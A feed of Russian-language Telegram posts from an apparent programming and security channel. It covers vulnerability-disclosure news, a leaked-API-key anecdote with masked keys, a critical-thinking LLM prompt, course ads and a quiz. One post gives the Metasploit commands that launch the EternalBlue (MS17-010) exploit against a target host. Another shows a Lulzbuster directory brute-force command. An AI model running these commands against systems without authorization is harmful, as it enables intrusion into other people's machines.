Google Project Zero обновила правила раскрытия уязвимостей. Это серьезно повлияет на скорость распространения патчей и защиту от атак.
Что в карточках:
Если хотите быть в курсе последних изменений и узнать, как они могут повлиять на безопасность вашей инфраструктуры — читайте важные тезисы выше.
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥3❤2👍1
Metasploit — это мощный инструмент, который ускоряет процесс поиска и эксплуатации уязвимостей. Платформа предлагает сотни эксплойтов для атак на системы, приложения и сервисы.
Зачем это нужно:
Как работает:
1. Запуск Metasploit в терминале:
msfconsole
2. Поиск уязвимостей:
Например, чтобы найти эксплойт для MS17-010 (EternalBlue):
search eternalblue
3. Настройка и активация эксплойта:
После выбора эксплойта настраиваем его:
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.100
exploit
Metasploit сам подберёт подходящий payload и подключится к целевой системе, если она уязвима.
#буст
Please open Telegram to view this post
VIEW IN TELEGRAM
👾4🔥1
Please open Telegram to view this post
VIEW IN TELEGRAM
😁6👍3💯1
Этот промпт превращает LLM в аналитика-контрария: он проверяет идею на слабые места, скрытые риски и недооценённые альтернативы.
Промпт:
<Role>
You are an expert Red Team analyst, strategic advisor, and cognitive challenger trained in dialectical reasoning, critical thinking, and systems analysis. Your role is to assess and challenge user ideas constructively, identifying potential flaws, risks, logical inconsistencies, and unstated assumptions, while also proposing mitigations, alternative strategies, or opposing views that could strengthen the original concept.
</Role>
<Context>
The user will provide a statement, idea, plan, or proposal they are currently considering. Your job is not to disprove the user, but to stress-test their reasoning by assuming the role of a thoughtful contrarian or Red Teamer.
</Context>
<Instructions>
1. Begin with a brief summary of the idea to confirm your understanding.
2. Conduct a Red Team Analysis of the idea using the following structure:
a. Identify key assumptions, biases, or blind spots.
b. Explore possible failure points or unintended consequences.
c. Offer at least 2 alternative perspectives or strategies that contrast with the user’s suggestion.
d. Provide constructive risk mitigation tactics, improvements, or revisions to make the original idea more resilient.
3. Maintain a respectful and collaborative tone. The goal is intellectual improvement, not antagonism.
4. Use frameworks such as “Premortem Analysis”, “Devil’s Advocate Reasoning”, and “First Principles Thinking” as needed.
5. Include a confidence score (0–100%) on how robust the original idea seems after your analysis.
</Instructions>
<Constraints>
- Do not agree automatically with the user’s idea.
- Avoid superficial or generic analysis; go deep.
- Keep the tone strategic, respectful, and intellectually curious.
</Constraints>
<Output Format>
<Summary>...</Summary>
<Contrarian Assessment>
- Key Assumptions: ...
- Blind Spots & Risks: ...
- Alternative Perspectives: ...
- Mitigation & Strengthening Strategies: ...
</Contrarian Assessment>
<Confidence Score>__%</Confidence Score>
</Output Format>
<User Input>
Reply with: "Please enter your idea, plan, or proposal and I will begin the Red Team analysis," then wait for the user to provide their specific suggestion.
</User Input>
Что даёт:
#буст
Please open Telegram to view this post
VIEW IN TELEGRAM
👏5👍1
Наш подписчик поделился своим опытом работы над клиентским SDK, когда случайно наткнулся на свои собственные ключи доступа к платёжному провайдеру в открытом репозитории:
«Сначала я подумал, что тестовый аккаунт заблокирован, но логи CI показали, что в переменную PAYMENT_API_KEY подставляется строка
sk_live_XXXXXXXXXXXXXXXXXXXXXXXX, а не мой тестовый ключ. Я открыл последние изменения и обнаружил, что файл config.js с живыми ключами был случайно закоммичен:
module.exports = {
apiKey: process.env.PAYMENT_API_KEY || 'sk_live_XXXXXXXXXXXXXXXXXXXXXXXX',
apiSecret: 'sh_live_YYYYYYYYYYYYYYYYYYYY'
};
Оказалось, что .gitignore был настроен только на config.prod.js, а я работал с config.js. Репозиторий был публичным несколько недель и успел получить форки и звёзды.»
#междусобойчик
Please open Telegram to view this post
VIEW IN TELEGRAM
🤔3👍1
Proglib Academy — это место, где вы превращаете теорию в практику. Здесь ваши знания становятся проектами для портфолио, а вы — более уверенным специалистом.
Выберите курс, который поможет сделать следующий шаг ⬇️
🚀 Для тех, кто начинает путь в IT:
— Основы IT для непрограммистов
— Программирование на Python (обновлённый)
— Frontend-разработчик с нуля: HTML, CSS, JavaScript
🧠 Для будущих и настоящих Data Scientist'ов:
— ML для старта в Data Science (начинается в сентябре)
— Базовые модели ML и приложения
— Математика для Data Science
— AI-агенты для DS-специалистов (скоро второй поток)
🛠️ Для опытных разработчиков, готовых к росту:
— Алгоритмы и структуры данных
— Архитектуры и шаблоны проектирования
Независимо от вашей цели, у нас есть курс, который поможет её достичь. Переходите в Proglib Academy, выбирайте свой путь и инвестируйте в навыки, которые всегда будут в цене!
Выберите курс, который поможет сделать следующий шаг ⬇️
🚀 Для тех, кто начинает путь в IT:
— Основы IT для непрограммистов
— Программирование на Python (обновлённый)
— Frontend-разработчик с нуля: HTML, CSS, JavaScript
🧠 Для будущих и настоящих Data Scientist'ов:
— ML для старта в Data Science (начинается в сентябре)
— Базовые модели ML и приложения
— Математика для Data Science
— AI-агенты для DS-специалистов (скоро второй поток)
🛠️ Для опытных разработчиков, готовых к росту:
— Алгоритмы и структуры данных
— Архитектуры и шаблоны проектирования
Независимо от вашей цели, у нас есть курс, который поможет её достичь. Переходите в Proglib Academy, выбирайте свой путь и инвестируйте в навыки, которые всегда будут в цене!
🔥3
Lulzbuster — это максимально быстрый инструмент для перебора директорий и файлов, написанный на C. Без лишнего софта, в один бинарь — и уже летит.
Какие возможности:
— Поиск скрытых директорий и файлов, на которые нет ссылок
— Фильтрация по статус-кодам, длине, редиректам
— Поддержка прокси, многопоточности и wordlist’ов с расширениями
— Умный режим (-S) для устранения мусора и фолсов
— Поддержка логирования и output в stdout или файл
Пример:
lulzbuster -u https://target.com -w common.txt -x php,zip,bak -t 40 -S
Подходит для багбаунти, внутреннего аудита и CTF
#буст
Please open Telegram to view this post
VIEW IN TELEGRAM
❤4🔥2⚡1
Многие забывают, что компрометация может произойти ещё на стадии разработки или сборки.
Что в карточках:
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥2👍1
Please open Telegram to view this post
VIEW IN TELEGRAM
💯4👾1
Как раньше назывался Wireshark?
Anonymous Quiz
9%
EtherPeek
56%
NetSniffer
17%
Ethereal
18%
PacketShark
🤔2🔥1